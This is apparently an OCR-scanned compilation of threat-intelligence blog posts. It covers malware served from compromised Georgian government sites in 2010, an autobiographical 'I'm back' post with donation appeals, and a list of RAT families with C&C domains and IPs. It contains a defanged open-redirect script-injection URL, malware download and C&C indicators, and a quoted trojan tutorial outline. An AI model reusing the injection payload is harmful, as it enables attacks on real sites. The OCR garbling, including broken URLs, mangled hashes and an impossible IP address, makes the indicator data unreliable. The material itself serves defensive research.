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It’s 2010 and I’ve recently came across to a compromised Georgian Government Ministry 
of Defense and Ministry of Justice official Web site spreading potentially participating in a 
wide-spread phishing and malware-serving campaign enticing users into interacting with the 
rogue U.S Intelligence and U.S Law Enforcement themed emails for the purpose of spreading 
and dropping malicious software on the targeted host’s PC. 


hilary kneber @hilarykneber - 16 Jan 2011 Vv 
#DANCHO DANCHEV Does anyone know .Js there a way I can determine the 
exact date that Dancho Danchev began to “unfollow" me? 


Oo tl 


Sample malicious URL known to have participated in the campaign abusing common Web Site 
redirection application vulnerability flaw: 


hxxp://www.mod.gov.ge/2007/video/movie.php?I=G &v= %20 %3E %20a %20href %20http 
%3A %2F %2Fofficialweightlosshelp.org %2Fwp-admin %2Freport.zip %20 %3EDownload %20 
%3C %2Fa %3E %20script %3Ewindow.OPEN %20http %3A %2F %2Fofficialweightlosshelp.org 
%2Fwp-admin %2Freport.zip %20 %3C %2Fscript %3E %20 #05184916461921807121 
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Official Weight Loss Help - Mozilla Firefox 


Eile Edit Yiew History Bookmarks Jbols Help 


=) v = ) 6 httpviwww.officialweightiosshelp.org ry “ “ye filezilla 


©) Official Weight Loss Help we v 


Official Weight Loss Help 


We li tefl you about orvy Ihe erst weight loss resources 


To search. ty} Seer 


With obesity affecting an increasing percentage of 
‘ the world population, more and more weight loss 
* products and programs are venturing into the market 
While this appears to be a good possibility initially, it 
has its flip side as well. Some of these products are 


Related malicious URLs known to have participated in the campaign: 


hxxp://officialweightlosshelp.org/wp-admin/report.zip 


Spread URL found within the config: 


hxxp://www.adventure-center.net/upload/x.txt - 195.70.48.67 
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Related compromised malicious URLs known to have participated in the campaign: 


hxxp://new.justice.gov.ge/files/Headers/in.txt 


hxxp://new.justice.gov.ge/files/Headers/fresh.txt 


hxxp://new.justice.gov.ge/files/Headers/rollers1.php 
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Related MD5s known to have participated in the campaign: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


d0c0a2e6b30f451f69df9e2514ba36f2 


974a4a516260a4fafb36234897469013 


ecb7304f838efb8e30a21189458b8544 


81b3bff487fc9a02e10288114fc2b5be 


234523904033f8dc692c743cbcf5cf2b 


e2fffaffc1064d24e7eab6bab90fd86fc 


6969 


MD5: 5941c9b5bd567c5baaecc415e453b5c8 


MD5: 0ff325365f1d8395322d1ef0525f3b1f 


MD5: 4437617b7095ed412f3c663d4b878c30 


MD5: eb66a3e11690069b28c38cea926b61d2 


MD5: 2b7e4b7c5faf45ebe48df580b63c376b 


Known to have participated in the campaign are also the following two domains part 
of the Hilary Kneber botnet: 


hxxp://dnicenter.com - Email: abuseemaildhcp@gmail.com 


hxxp://dhsorg.org - Email: hilarykneber@yahoo.com 


Related malicious download location URLs known to have participated in the campaign: 
hxxp://www.zeropaid.com/bbs/includes/CYBERCAFE.zip 
hxxp://rapidshare.com/files/318309046/CYBERCAFE.zip.html 
hxxp://www.sendspace.com/file/fmbt01 

hxxp://hkcaregroup.com/modlogan/MILSOFT.zip 
hxxp://rapidshare.com/files/320369638/MILSOFT.zip.html 
hxxp://fcpra.org/downloads/MILSOFT.zip 

hxxp://fcpra.org/downloads/winupdate.zip 


hxxp://www.sendspace.com/file/tj37 31 
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hxxp://mv.net.md/update/update.zip - 195.22.225.5 
hxxp://www.sendspace.com/file/7jmxtq 
hxxp://mv.net.md/dsb/DSB.zip 
hxxp://www.sendspace.com/file/rdxgzd 
hxxp://timingsolution.com/Doc/BULLETIN.zip 
hxxp://www.sendspace.com/file/goz3yd 
hxxp://dnicenter.com/docs/report.zip 
hxxp://dhsorg.org/docs/instructions.zip - 222.122.60.186; 222.122.60.1 
hxxp://www.sendspace.com/file/h96uh1 
hxxp://depositfiles.com/files/xj lwvamc4 
hxxp://tiesiog.puikiai.It/report.zip 
hxxp://somashop.Iv/report.zip 
hxxp://www.christianrantsen.dk/report.zip 
hxxp://enigmazones.eu/report.zip 
hxxp://www.christianrantsen.dk/report.zip 


hxxp://enigmazones.eu/report.zip 


hxxp://gnarus.mobi/media/EuropeanUnion MilitaryOperations EN.zip 


hxxp://quimeras.com.mx/media/EuropeanUnion _MilitaryOperations EN.zip - 66.147.242.169 


Related malicious and fraudulent domains known to have participated in the campaign: 
hxxp://dhsinfo.info - 218.240.28.34 
hxxp://greylogic.info - 218.240.28.34; 218.240.28.4 


hxxp://intelfusion.info - 218.240.28.34 
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hxxp://greylogic.org - 222.122.60.1 


Related malicious MD5s known to have participated in the campaign: 
MD5: 8b3a3c4386e4d59c6665762f53e6ec8e 
MD5: 5fb94eef8bd5 7fe8e20ccc56e33570c5 


MD5: 28c4648f05f46a3ec37d664cee0d84a8 


Once executed a sample malware phones back to the following C &C server IPs: 
hxxp://from-us-with-love.info - 911.216.141.171 
hxxp://from-us-with-love.info/imglov/zmpt4d/n16v18.bin 


hxxp://vittles.mobi - 174.132.255.10 


hxxp://nicupdate.com - 85.31.97.194 


Related malicious and fraudulent IPs known to have participated in the Hilary Kneber 
botnet campaign: 


hxxp://58.218.199.239 
hxxp://59.53.91.102 
hxxp://60.12.117.147 
hxxp://61.235.117.71 
hxxp://61.235.117.86 
hxxp://61.4.82.216 
hxxp://193.104.110.88 
hxxp://95.169.186.103 


hxxp://222.122.60.186 
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hxxp://217.23.10.19 
hxxp://85.17.144.78 
hxxp://200.106.149.171 
hxxp://200.63.44.192 
hxxp://200.63.46.134 
hxxp://91.206.231.189 
hxxp://124.109.3.135 
hxxp://61.61.20.134 
hxxp://91.206.201.14 
hxxp://91.206.201.222 
hxxp://91.206.201.8 
hxxp://216.104.40.218 


hxxp://69.197.128.203 


Related malicious and fraudulent domains known to have participated in the Hilary Kneber 
botnet campaign: 


hxxp://123.30d5546ce2d9ab37.d99q.cn 
hxxp://d99q.cn 

hxxp://524ay.cn 

hxxp://adcounters.net 
hxxp://adobe-config-s3.net 
hxxp://mywarworld.cn 
hxxp://aqaqaqaq.com 
hxxp://avchecker123.com 
hxxp://bizelitt.com 


hxxp://biznessnews.cn 
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hxxp://bizuklux.cn 
hxxp://fcrazy.com 

hxxp://fcrazy.eu 

hxxp://boolred.in 

hxxp://brans.pl 
hxxp://britishsupport.net 
hxxp://bulkbin.cn 

hxxp://chaujoi.cn 
hxxp://checkvirus.net 
hxxp://chinaoilfactory.cn 
hxxp://chris25project.cn 
hxxp://client158.faster-hosting.com 
hxxp://cwbnewsonline.cn 
hxxp://cxzczxccc.com.cn 
hxxp://dasfkjsdsfg. biz 
hxxp://dia2.cn 
hxxp://digitalinspiration.e37z.cn 
hxxp://dolbanov.net 
hxxp://dolcegabbana.djbormand.cn 
hxxp://djbormand.cn 
hxxp://download.sttcounter.cn - 61.61.20.134; 211.95.78.98 
hxxp://sttcounter.cn 
hxxp://dred3.cn 

hxxp://dsfad.in 


hxxp://e37z.cn 
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hxxp://e58z.cn 
hxxp://electrofunny.cn 
hxxp://electromusicnow.cn 
hxxp://elsemon.cn 
hxxp://fcrazy.info 
hxxp://filemarket.net 
hxxp://flo5.cn 
hxxp://footballcappers.biz 
hxxp://fobsl.cn 
hxxp://forum.d99q.cn 
hxxp://gamno6.cn 
hxxp://gidrasil.cn 
hxxp://gifts2010.net 
hxxp://ginmap.cn 
hxxp://giopnon.cn 
hxxp://gksdh.cn 
hxxp://glousc.com 
hxxp://gnfdt.cn 
hxxp://gold-smerch.cn 
hxxp://goldenmac.cn 
hxxp://google.maniyakat.cn 
hxxp://maniyakat.cn 
hxxp://greenpl.com 
hxxp://grizzli-counter.com 


hxxp://grobin1.cn 
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hxxp://inpanel.cn 
hxxp://itmasterz.org 
hxxp://iuylqb.cn 
hxxp://kaizerr.org 
hxxp://keepmeupdated.cn 
hxxp://khalej.cn 
hxxp://kimosimotuma.cn 
hxxp://klaikius.com 
hxxp://klitar.cn 
hxxp://kolordat482.com 
hxxp://kotopes.cn 
hxxp://liagand.cn 
hxxp://love2coffee.cn 
hxxp://majorsoftwareupdate.info 
hxxp://marcusmed.com 
hxxp://mcount.net 
hxxp://mega-counter.com 
hxxp://monstersoftware. info 
hxxp://morsayniketamere.cn 
hxxp://mydailymail.cn 
hxxp://mynewworldorder.cn 
hxxp://newsdownloads.cn 
hxxp://nit99.biz 
hxxp://nm.fcrazy.com 


hxxp://nmalodbp.com 
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hxxp://not99.biz 
hxxp://online-counter.cn 
hxxp://pedersii.net 
hxxp://piramidsoftware.info 
hxxp://popupserf.cn 
hxxp://qaqaqaqa.com 
hxxp://qaqaqaqa.net 
hxxp://qoxql6.com 
hxxp://redlinecompany.ravelotti.cn 
hxxp://ravelotti.cn 


hxxp://relevant-information.cn 


Related Hilary Kneber botnet posts: 

[1]Keeping Money Mule Recruiters on a Short Leash 

[2]Standardizing the Money Mule Recruitment Process 

[3]Dissecting the Exploits/Scareware Serving Twitter Soam Campaign 


[4]Koobface Botnet Starts Serving Client-Side Exploits 


1, tips: //adanchev ;blogepot .con/2008/1/keeping-noney-mule~recruiters-on-short tal 
2, hesps://adanchev blogspot. con/2009/10/standardizing-noney-nule-recruitaent heal 
3, https: //adanchev blogspot. con/2010/06/dissecting~exploitsscarevare-serving. hin 
4. https: //ddanchev. blogspot .com/2009/11/koobface-botnet~starts-serving-client .html 


15.8.7. I’m Back! (2019-09-17 09:56) 
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Dear blog readers - it’s been a while since I’ve last posted a quality update following my 
[1]disappearance and possible kidnapping attempt circa 2010 but as many of you have 
noticed I’ve recently published a variety of research and CYBERINT type of articles ina 
variety of areas which means that I'll be shortly returning to the usual blogging rhythm 
successfully publishing a quality set of research articles anytime soon. I’ve also wanted to let 
you know that I’ve recently launched an extremely popular News Portal called [2]Unit-123 
offering practical advice to the U.S Intelligence Community including Cyber Warriors and 
Cyber Warfare experts including a Cyber Security and Hacking Community called 
[3]Offensive Warfare including a Bitcoin soliciting bid on the Dark Web for the upcoming 
launch of a proprietary custom-based Virtual Reality Social Network for Hackers and Security 
Experts called [4]Cybertronics (dzxvmqrl3rjxbzuer6vv5ejahniz2nefqxfmwspfmvzjo4x 
xzm7n4xad.onion) including the usual interview spree in an attempt to land a permanent job 
position as I’ve been working on a variety of personal and proprietary Security and OSINT 
projects. 
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Are you interested in having me speak at your event? Are you interested in inviting me 
to join a classified and potentially sensitive event or research group? Are you interested 
in becoming a writer at this blog? Are you interested in advertising at this blog? Feel free 
to approach me - disruptive.individuals@gmail.com 


Consider going through some of my most recently published research: 


[5]Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted Checklist - OSINT Anal- 
ysis 


[6]Exposing Yet Another Currently Active Fraudulent and Malicious Pro-Hamas Online In- 
fastructure 


[7]Flashpoint Intel Official Web Site Serving Malware - An Analysis 
[8]Historical OSINT - "| Know Who DDoS-ed Georgia and Bobbear.co.uk Last Summer" 


[9]Historical OSINT - A Peek Inside The Georgia Government’s Web Site Compromise Mal- 
ware Serving Campaign - 2010 


[10]Historical OSINT - Profiling a Rogue and Malicious Domain Portfolio of OEM-Pirated 
Software 


[11]Historical OSINT - Able Express Courier Service Re-Shipping Mule Recruitment Scam 
Spotted in the Wild 


[12]Historical OSINT - Global Postal Express Re-Shipping Mule Recruitment Scam Spotted 
in the Wild 


[13]Historical OSINT - Re-Shipping Money Mule Recruitment "Your Shipping Panel LLC" 
Scam Domain Portfolio Spotted in the Wild 


[14]The Threat Intelligence Market Segment - A Complete Mockery and IP Theft Compro- 
mise - An Open Letter to the U.S Intelligence Community 


[15]Historical OSINT - A Portfolio of Fake Tech Support Scam Domains - An Analysis 


[16]Historical OSINT - Georgian Justice Department and Georgia Ministry of Defense Com- 
promised Serving Malware Courtesy of the Kneber Botnet 


[17]Historical OSINT - The Russian Business Network Says "Hi" 


[18]Profiling "Innovative Marketing" - The Flagship Malvertising andf Scareware Distributor 
- Circa 2008 - An OSINT Analysis 
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¢ [19]JExposing Evgeniy Mikhaylovich Bogachev and the "Jabber ZeuS" Gang - An OSINT 
Analysis 


¢ [20]Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber and XMPP 
Accounts 


In this post I’ll walk you though the story of my disappearance including a brief introduction 
and explanation of my "hacker enthusiast" years circa the 90’s where I’ve been busy doing 
"lawful surveillance" and "lawful interception" throughout my teenage years while | was not 
busy working full-time with several H/C/P/A (Hacking/Cracking/Phreaking/Anarchy) groups as 
a full-time member practically setting up the foundations of the Threat Intelligence market 
segment a few years later including the basics of Technical Collection type of position 
including Independent Contractor working under NDA in a post 9/11 World including a 
personal greeting to everyone who’s been approaching me and reaching out offering support 
and technical and operational "know-how" including general "say hi" advice. 


| want to express a personal gratitude to a good old research friend - [21]Internet 
Anthropologist - who actually [22]initiated a track-down action and managed to indirectly 
find me circa 2010 with the help of international and Bulgarian law-enforcement including 
fellow colleagues and friends from the Security Industry and U.S Intelligence Community circa 
2008-2013 who attempted to track me down and find out more about my disappearance. 


In this post I’ll discuss my visit to the GCHQ circa 2008 with the Honeynet Project including an 
in-depth discussion on my "lawful interception" and "lawful surveillance" experience circa the 
90’s throughout my teenage hacker years including an in-depth discussion on the hacking 
Scene that | was proud to be a member of throughout the 90’s having successfully 
participated in a variety of community and commercial projects including a personal thanks 
to the following friends and colleagues for offering support and keeping track of my research: 
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[23]Jamie Riden for making a personal contribution to my PayPal account for research 
purposes 


[24]Steve Santorelli from Team Cymru for expressing interest in a proprietary Threats 
Database 


[25]Michal Salat for participating in a brief trial of my Threat Data service 


[26]lan Cook for making a personal introduction to my current part-time employer [27]KCS 
Group Europe 


[28]Jeffrey Bardin from Treadstone71 who reached out and offered employment opportu- 
nity 


[29]Harrison Cook who’s been persistently donating and reaching out to support the Of- 
fensive Warfare 2.0 community 


[30]John Young from Cryptome.org who helped spread the word about the Offensive War- 
fare 2.0 Community 


[31]Liran Sorani from Webhose for the opportunity to participate in a part-time project 
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SIZE: 124.928 


REMOTE ACCESS TROJAN Portis) 
Wors E-MAIL PROPAGATION 
Wors: IRC PROPAGATION 
KEYSTROKE LOGGER 
FTP SERVER 
PASSWORD GRABBER 
DESTRUCTIVE 
TARGETS SPECIFIC PROGRAMS 
36 alpha STARTS EVERYTIME WINDOWS STARTS 


Doly Tro 
E-MAIL 


word Sender 1.06 


E-MAIL Password Sender 1.07 
Evil FTP 


The functions of this trojan are 


Fal e 
Firehotch ckDoorz 1.03 
Fore 1.0 beta ! 


name, dive 


GilFtiend 1 
Database Viewer Copyright © 1999, Diamond Computer Systems Pty. Ltd. ~ Information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg) 


An In-depth Analysis of the Hacking Scene circa the 90’s through the prism of Dancho 
Danchev also known as tHe mAnlaC: 
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In a World where we’ve successfully set the foundation of offensive clandestine and 
psychological operations including the foundations of Technical Collection and the 
foundations of the [32]Threat Intelligence market segment including the persistent emphasis 
on cyber threats facing U.S Government and U.S National Infrastructure in the context of 
enriching and disseminating actionable Threat Intelligence on a variety of U.S Intelligence 
Community including academic partners throughout the past decade successfully leading me 
to participate in a Top Secret GCHQ Surveillance and Monitoring Program basically keeping 
track of hackers and security researchers on Twitter for proactive Cyber Defense and OSINT 
purposes called "[33]Lovely Horse" including a possible "4th Party Collection" trend-setting 
initiative circa 2008-2013 labeling some of my research as a possible "4th Party Collection" 
partner of U.S Intelligence Community including the [34]tracking and take down of the 
Koobface botnet including my experience as a Managing Director of "The Underground" also 
known as [35]Astalavista Security Group’s Astalavista.com ([36]Security Interviews - Part 
01; [37]Security Interviews - Part 02; [38]Security Interviews - Part 03) throughout 
2003-2006 with my ex-girlfriend now partner in life - Yordanka Ilieva - when we used to rock 
the boat - and are prone to do so. Takes you back doesn’t it? Keep reading. 
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Personal Photo of bedroom hacker - today’s leading expert in the field of cybercrime 
research security blogging and threat intelligence gathering - Dancho Danchev also known 
as the tHe mAnlaC circa the 90’s with his hacker girlfriend - Yordanka Ilieva - including 
various personal projects circa the 90’s 
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-={ Blackcode Ravers Magazine Issue 2 }=- 
Home page : http://www. blackcode. com 
Editor of the magazine: tHe mAniAc 
themaniac@blackcode. com 


Table of Contents: 


L. Editorial 

2.Mirrors of the magazine 

3.Latest News With Blackcode Ravers 
4.HOw to break your school security 
5.About Virii 

5. Advertising 

7.Trojans Section 

8.For the newbies 

9.Linux Section 

LO. Interviews 

L1.Final words 


It's me again. This is our second issue.I've changed the 

design and I've added several new things in the newsletter. 

[I've also received a lot of e-mails about our magazine. 

People like it and they want more information here. 

The first issue was short one but of course every new 

issue has many_new things added in it. 

I'm a people like it and we have MANY new subcribers every day. 
4lso we have much more visitors than before. 
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LockDown 2000 v4.0 - 0 share connection{s) 


File View Help 
1a o2™ oh 
> Bs > 8 — 5 3 > 


Scan O ptions Logs Auto-Kick Del. User Add User Kick List Unlock 
Main | Net Utilties | Shares Current Share Connections | Former Share Connections | 
~Network Information, 


=). ER HACKER 
=1-Ga D Enter time: 2:52 AM 
S D:AWINDOWS\DEFRAG.EXE Enter date: 07/15/99 
D:\WINDOWS\DRVSPACE.EXE San 
8 ] HACKER Connected time: 00:03:04 
Ga D Idle tine: 
E Sao. IP address: 207.175.32.45 
89) D-\WINDOWS\WINIPCFG. EXE scl Michael Clark 
a, D:\WINDOWS\WRITE.EXE dn20-clark-02. tampabay.mis.net 
=) ER HACKER 
=|-4 BROTHER 
C) D:AWINDOWS\spool\PRINTERS 
| 


Disconnect mode: [OFF] Number of current users: 0 db 
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|The Complete Trojans Text | «-<-<<<- |Weitten On 
| (Security Related) | | 

|by tHe MaNiAc | | 3.04. 2000 
|contact me at: themaniac@blackcode.com |[-------- lttetetetee 


|maniac@forbidden.net-security.org | 
ee ee ee ee ee eee ee eee 


This guide is for educational purposes only I do not take any responsibility about anything 
happen after reading the guide. I'm only telling you how to do this mot to do it. It's your decision. 
If you want to put this text on your Site/FTP/Newsgroup or anything else you can do it but don't 


change anything without the permission of the author.I'll be happy to see this text on other pages too. 


All copyrights reserved.You may destribute this text as long as it's not changed. 


Pe ee ee ee ee ee ee 


Author Notes: 


I hope you like my texts and find thes useful. 

If you have any problem or some suggestion feel free to e-mail me but please don't send mails like 
“I want to hack the US government please help me” or “Tell me how to blind a trojan into a .jpg” 
“WHere can I get a portscanner™ etc...... 

Be sure if I con help you with something I will do it. 

I've started writing security related tutorials and I hope you like that.I°ll try to cover 

much more topics in ay future texts and I want to thank to all of the people that like ay 

texts. 


Here you can find other texts \ 
written by me or other friends: 
http: //mwar.blackcode.com / 
blacksun.box.sk / 
neworder .box.sk f 


1.wWhat Is This Text About? 

2.What Is A Trojan Horse \ 
-3.Trojans Today \ 

4.The future of the trojans \ 
S.Anti-Virus Scanners \ 

-6.How You Can Get Infected? \ 

eecee From I¢Q ' 
o<«e- From IRC \ 
ied From Attachment \ 
co--- From Physical Access \ 
o---- From Trick 

-7.How Dangerous A Trojan Can Ge? \ 
-8.0ifferent Kinds Of Trojans 

cree Remote Access Trojans 

----- Password Sending Trojans 

-+--- Keyloggers \ 
«+00 Destructive Trojans 

eccce FTP Trojans 

-9.Who Can Infect You? 


t «= s «se z- « 
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Security Portal,Unique Products And Services 
This is Frame4 Security Systems 
A Mast Visit For Everyone Interested In Computer Security 


UPDATED!!!.. The Complete Windows Trojans Paper UPDATED!!! 
Unique Publication That Will Answer You All The Questions You've Ever Had About Windows Trojans.How They Work.How To Protect,How You Get Infected. 
If You're Interested In Reading More Publications Subscribe In The Newsletter You'll Find When Visiting The Publications Page. 


Most Downloaded Files: 
ezhounce.tar.gz 
messala.tangs 
nimap.tgz 
psyBNC2.2.2.targz 
The Best E-Book On Linux Basics I've Ever Read Online!!! 
Trojans'W VBS n 


Enee E-books Archive CLICK AGAIN TO ACCESS THE E-BOOKS! 
Eree E-books Archive 2 -CLICK AGAIN TO ACCESS THE E-BOOKS! 


aK | 


Support Me And Vote For That Site If You Found What You Were Looking For Or Find It Interesting 


| happen to have directly established a connection with one of the primary Sub7 Trojan 
Horse authors HeLLfiReZ which makes me pretty close to [39]Steve Gibson in one way or 
another - throughout the 90’s where we exchanged Trojan Horse samples while | was busy 
working for Trojan Defense Suite and the infamous Lockdown2000 anti-trojan software 
suite where | was busy working on signatures and help-guides compilation while | was also 
busy being a member of several hacking groups primarily found on the Cyberarmy.com 
Top 50 Hacking List including Progenic.com Top 100 hacking sites list. 


Mail-bombing was a trend - in particular my personal experience of making jokes with 
friends who were unable to take care of 100+ email messages in their Inbox 


Mass-Mailing List subscription - in particular the fact that my friends were not capable of 
finding a productive way to get rid of the messages and unsubscribe themselves 


Telephony Denial of Service attack circa the 90’s exploiting a popular for Eastern Europe 
Mail2SMS mobile provider feature - in particular the fact that it’s not necessarily a pleasant 
experience to get rid of 100+ SMS messages received in a short-period of time 
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¢ "Lawful Interception" of friends - something else that I’m not particularly proud of is my 
"lawful surveillance" and "lawful interception" experience and capabilities of people that 
| knew and that I used to know largely driven by the need to explore and learn more 


¢ Corporate Experience in the field of anti-trojan detection technologies and categoriza- 
tion - in particular my experience in creating trojan horse signatures and writing actual 
technical descriptions for the purpose of improving my employer’s overall detection rate 
for a variety of trojan horse vendors circa the 90’s. 


Do you remember my work from the 90’s? Are you familiar with the Scene circa the 90’s? 
Feel free to approach me - disruptive.individuals@gmail.com or make a PayPal donation using 
my PayPal ID: dancho.danchev@hush.com for the purpose of fueling growth into my research. 


. https: //ddanchev. blogspot . com/2019/04/dancho-danchevs- 2010-disappearance. html 

| https: //anit-128.org/ 

pepe: //ottensive- warfare, coa/ 

| http: //azxvagrSrjxbzuer6v5ejahnizinedqafavopinvajo4nszaTadxad, onion 

_ hep: //adanchev. blogspot .con/2019/01/exposing- irans-nost-vanted. hen] 

_ https: //adanchev. blogspot con/2019/06 exposing-yet-another-currently-active, hia 


https ://ddanchev. blogspot. com/2019/04/flashpoint-intel-official-web-site.htm 


ttps://ddanchev.blogspot.com/2019/02/historical-osint- i-know-who-ddos-ed. htm 


ttps ://ddanchev. blogspot .com/2019/02/historical-osint-peek- inside-georgia.htm 
. https://ddanchev. blogspot .com/2019/02/historical-osint-profiling-rogue-and. htm 


. https://ddanchev. blogspot .com/2019/02/historical-osint-able-express- courier. htm 


12. https: //ddanchev. blogspot .com/2019/02/historical-osint-global-postal-express.htm 


. https://ddanchev. blogspot .com/2019/02/historical-osint-re-shipping-money-mule. htm 


14. https: //ddanchev. blogspot .com/2019/01/the-threat-intelligence-market-segment .htm 


. https: //ddanchev. blogspot .com/2019/01/historical-osint-portfolio-of-fake-tech. htm 


. https: //ddanchev. blogspot .com/2019/09/historical-osint-georgian- justice. htm 
. https://ddanchev. blogspot .com/2019/09/historical-osint-russian-business.htm 


. https://ddanchev. blogspot .com/2019/07/profiling-innovative-marketing-flagship.html 


19. https://ddanchev. blogspot .com/2019/07/exposing-evgeniy-mikhaylovich-bogachev.htm 


. https: //ddanchev.blogspot .com/2019/07/profiling-currently-active-portfolio-of.htm 


21. http://warintel.blogspot.com/ 


ttps://web.archive.org/web/20110120170150/http://warintel .blogspot.com/2011/01/dancho-danchev-missing. 


23. 
24, 

25; 
26. 

27. 

28. 

29, 

30, 


31. https://webhose.io/ 
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33. https: //theintercept .com/document /2015/02/04/lovely-horse-gchq-wiki-overview/ 


32. https: //ddanchev. blogspot .com/2019/01/the-threat-intelligence-market- segment. htm 


34. https: //www.youtube.com/watch?v=hgQ_nxoMXz 
35. https: //packetstormsecurity.com/groups/astalavista 


. https: //ddanchev. blogspot .com/2006/01/security-interviews-20042005-part-1.htm 


. https: //ddanchev. blogspot .com/2006/01/security- interviews-20042005-part-2.htm 


. https: //ddanchev. blogspot .com/2006/01/security- interviews-20042005-part-3.htm 


39. https: //www.pcworld.co.nz/article/487101/net_bullying_backfires/ 


15.8.8 Massive Portfolio of APT (Advanced Persistent Threat) and RAT (Remote Ac- 
cess Tools) Domains Spotted in the Wild - An Analysis (2019-09-20 17:17) 


ue 


Manufacturer Version 


kyocera 


samst 


Status: Listening for n¢ 


Se File Voyager 


a) SMS Trekker 
S Call Manager 


&® whatsApp Reader 
ml Contacts Browser 
&) Browser History 
| App Manager 
&> GPS Pinpointer 


D Remote Ears 


2 Remote Eyes 
P= Browser 

@ Message Toaster 
Ea Detailed Info 


As Settings 
© Reset DJ Server 


IP Address 


In a world dominated by thousands of currently active APT (Advanced Persistent Threat) cam- 
paigns also known as Remote Access Tools (RATS) including trojan horses it’s worth pointing 
out that novice cybercriminals continue relying and actively utilizing a variety of commercial 
and publicly obtainable DIY (do-it-yourself) Remote Access Tools (RATS) for the purpose of 
committing cyber espionage and launching malicious and fraudulent cyber espionage themed 
campaigns targeting thousands of users including companies and nation-state actors. 
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In this post I'll provide actionable intelligence on some of the most popular RAT (Remote 
Access Tools) currently utilized for APT (Advanced Persistent Threat) type of nation-state 
sponsored and tolerated cyber espionage themed campaigns including an in-depth discussion 
on a massive domain portfolio of currently active C &C server IPs known to have participated in 
a variety of APT (Advanced Persistent Threat) type of cyber espionage campaigns throughout 
2015-2019. 


Among the most popular APT (Advanced Persistent Threat) and Remote Access Tools 
(RATs) releases based on my public and proprietary sensor network remain the following 
currently obtainable commercial and publicly obtainable tools: 


°* Casa RAT 

¢ Bandook RAT 

¢ Dark Comet Rat 
* Cerberus 

* Cybergate 

¢ Blackshades 

¢ Poison Ivy 

¢ Schwarze Sonne RAT 
¢ Syndrome RAT 
¢ Team Viewer 

¢ Y3k RAT 


¢ Snoopy 


5p00f3r.N $ RAT 
¢ SpyNet 


P. Storrie RAT 


Turkojan Gold 
¢ Bifrost 

¢ Beast 

e Shark 

¢ Pain RAT 


¢ xHacker Pro RAT 
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Seed RAT 

Optix Pro RAT 
Dark Moon 
NetDevil 

Deeper RAT 
MiniMo RAT 
Alusinus RAT v0.8 
Babylon 1.6.0.0 
Bozok 1.4.3 

BX RAT v1.0 

Cloud Net RAT 
Comet RAT v0.1.4 
Coringa-RAT v0.1 
Crimson 3.0.0 
Crimson RAT 2.2.6 
ctOs 1.3.0.0 
CyberGate v1.01.12 
Dark Comet 5.3 
DarkComet Legacy 
DH Rat 0.3 

D-RAT 

Frutas RAT v0.9 
Greame RAT v1.9 
HAKOPS RAT v2 
Imminent Monitor 3.9.0.0 
Imperium RAT Cracked 
jRat 

jSpy 

jSpy RAT v0.09 
KilerRat V 10.0.0 
L6-RAT Beta 
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Maus 2.0b 

Mega RAT 1.5 Beta 
MLRAT 

MQ5 RAT 
NanoCore 1.2.2.0 
NingaliNET v1.1.0.0 
NjRAT 0.7 

njRAT v0.8d By Nasser2012 
njworm 

NovaLite v3.0 
Nuclear RAT 2.1.0 
Orion RAT 0.9 Free 
Pandora RAT V1.1 
Paradox RAT 

Proton 1.1.0.6 
pupy-master 

Poison Ivy 

Quasar 1.1 + Source 
QuasarRAT v1.3.0.0 
Rabbit-Hole Autoit RAT v1.0 Beta 2 
Revenge RAT v0.1 
SkyWyder 2.2 
Spycronic 1.02.1 
Spygate 2.6 
SpyGate-RAT 3.3 
SpyNet 0.7 Public 
Spy-Net v2.6 
Turkojan 4.0 Gold 
ucuL v1.1 

Vantom RAT 

Virus Rat v8.0 Beta 
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¢ Xena Rat 2.0 


¢ xRAT 2.0 


Related domains and IPs known to have participated in various APT (Advanced Persistent 
Threat) and Remote Access Tools (RATs) type of malicious and fraudulent campaigns through- 
out 2015-2019: 
hxxp://009boot.ddns.net/ 
hxxp://104.144.198.115/ 
hxxp://105.105.104.198/ 
hxxp://105.105.173.58/ 
hxxp://105.105.185.105/ 
hxxp://109.201.189.13/ 
hxxp://111.221.29.254/ 
hxxp://115.126.219.31/ 
hxxp://118.26.141.209/ 
hxxp://118.26.141.210/ 
hxxp://122.46.15.164/ 
hxxp://123unk123.ddns.net/ 
hxxp://13.124.168.74/ 
hxxp://130.25.242.66/ 
hxxp://133katelinn.hopto.org/ 
hxxp://138.130.206.150/ 
hxxp://139.162.175.167/ 
hxxp://141.255.159.3/ 
hxxp://149.129.133.195/ 
hxxp://149.3.143.104/ 


hxxp://151.101.2.110/ 
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hxxp://160.202.163.243/ 
hxxp://167.108.52.154/ 
hxxp://167.116.22.242/ 
hxxp://167.116.32.152/ 
hxxp://167.116.48.151/ 
hxxp://167.99.251.51/ 
hxxp://177.130.49.118/ 
hxxp://178.54.139.105/ 
hxxp://179.125.62.162/ 
hxxp://179.221.42.45/ 
hxxp://18.218.228.132/ 
hxxp://180.68.114.205/ 
hxxp://181.214.55.23/ 
hxxp://181.46.172.191/ 
hxxp://181.52.105.187/ 
hxxp://185.125.205.81/ 
hxxp://185.125.205.91/ 
hxxp://185.148.241.58/ 
hxxp://185.208.211.235/ 
hxxp://185.209.85.74/ 
hxxp://185.254.183.115/ 
hxxp://185.31.161.186/ 
hxxp://185.56.90.77/ 
hxxp://185.81.157.24/ 


hxxp://185.82.216.57/ 
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hxxp://185.84.181.89/ 
hxxp://186.118.110.209/ 
hxxp://186.118.111.142/ 
hxxp://188.165.224.26/ 
hxxp://188.2.137.168/ 
hxxp://188.54.182.240/ 
hxxp://188.54.184.36/ 
hxxp://188.66.7.124/ 
hxxp://188.72.104.64/ 
hxxp://188.83.129.33/ 
hxxp://189.47.113.180/ 
hxxp://189.47.114.215/ 
hxxp://191.101.22.196/ 
hxxp://192.169.69.25/ 
hxxp://194.182.73.173/ 
hxxp://194.5.98.56/ 
hxxp://197.207.219.206/ 
hxxp://2.20.242.8/ 
hxxp://2.21.242.237/ 
hxxp://201.208.105.81/ 
hxxp://202.195.210.218/ 
hxxp://204.44.78.113/ 
hxxp://211.108.133.241/ 
hxxp://211.44.166.16/ 


hxxp://212.129.42.206/ 
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hxxp://212.133.210.232/ 
hxxp://212.47.247.76/ 
hxxp://212.7.208.105/ 
hxxp://212.83.170.126/ 
hxxp://213.183.58.39/ 
hxxp://213.208.129.200/ 
hxxp://217.103.124.136/ 
hxxp://218.204.141.228/ 
hxxp://220.124.23.84/ 
hxxp://23.105.131.162/ 
